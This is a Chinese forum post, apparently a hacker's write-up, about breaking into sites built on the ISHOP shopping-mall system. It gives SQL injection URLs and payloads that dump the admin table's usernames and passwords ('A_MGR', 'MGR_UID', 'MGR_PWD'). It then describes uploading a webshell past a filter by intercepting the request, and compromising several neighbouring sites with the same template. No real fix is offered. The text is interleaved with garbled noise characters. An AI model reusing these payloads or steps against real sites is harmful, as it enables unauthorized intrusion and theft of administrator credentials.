ISHOP商场建站系统注入漏洞

admin

发现一个注入点
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

习惯性的加’having1=1--
0 R! y; ~& T: g% W3 c* w' b/ J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

/ }0 X7 z8 f# j( u0 y0
: }: }8 g  V, D9 R
爆出Diary_A.dl_Title（这时候很激动啊）
0 C0 l3 r7 b$ \1 \$ [+ C: \7 Y
那么继续
- V8 u* H" ?& c* D- M  n, ]: Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

& d, g/ l$ X+ f! G  S, g继续，一直爆下去

8 V, P( j) R; n! k9 o7 }5 [6 X4 ]爆到几个字段和表段 但是没找到需要的管理用户的字段
$ ^5 `' x' s% g, C0 E
蛋疼了 怎么办 然后去后台登陆页看源码
# E( F- [1 B2 Y  K9 N
0

' L6 a. ]9 h# I+ xInput name= “ADUID”
6 s9 I1 [% v4 S& d: Q0 [- qInput name= “ADPWD”
, {4 G2 [6 q( v2 x" P3 a( D
% N3 q/ r+ D0 }) D( H$ W3 \很幸运 找到了字段那就继续
找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
. ^* l) A2 u0 e  F& f: |$ h; I/ Ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
6 c3 X4 x$ E( @; K5 A测试了下 这个注入点只能爆到文章哪里的表
7 ], v; Y! j! n' }
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

: o9 {4 ^+ o4 ^5 O9 k/ J! B又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

473
" X0 `! E! a! I* d9 ~! h$ C
- f: K) ?+ a& M$ W" u进后台


发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马
' T* ^7 V- A; F5 L  A% ]/ l

) n" |* a0 H! |3 X1 E5 P在系统管理那里直接上传 不过没有显示地址

+ l: g2 b, ^: _' q5 s再上传一次 抓包 搞定OK

9 f$ Z+ d# X2 M- Y

472

8 B8 H: U# t9 t3 i7 ]晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧
. c  p% k# V3 S0 j7 ^+ D
找个站 就把这个站的旁c扫了下
; H! ]1 Q+ C/ [# O  f
发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试
6 w) W1 G5 w3 S' p' S$ W' m% B/ S
'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀
" Z& z6 z% q" E8 L) M
2 X9 q2 D9 w% j/ ?/ D8 w/ T再次翻c段

翻出几个站 都成功拿下
" ^+ h- o& J( h, P, S4 b' |
+ T4 _4 {1 ]& c! V" |
' r. |  M4 q9 t
修复方案：
他们比我专业
- Q3 A# f% Y. ^$ ^  ~* u​

& S, D# K7 z  L6 y1 }8 |